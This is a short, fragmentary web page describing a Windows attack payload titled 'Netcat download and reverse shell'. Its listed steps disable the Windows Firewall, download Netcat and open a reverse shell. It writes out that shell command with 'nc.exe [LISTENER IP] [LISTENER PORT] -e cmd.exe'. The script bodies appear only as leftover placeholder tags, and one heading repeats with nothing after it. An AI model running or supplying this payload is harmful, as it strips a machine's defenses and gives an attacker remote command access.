Payload Netcat download and reverse shell
This script will:
- Disable the Microsoft Windows Firewall
- Download Netcat
- Run Netcat mode reverse shell (nc.exe [LISTENER IP] [LISTENER PORT] -e cmd.exe)
[crayon-6a61880537706837143566/]
This script will:
[crayon-6a61880537706837143566/]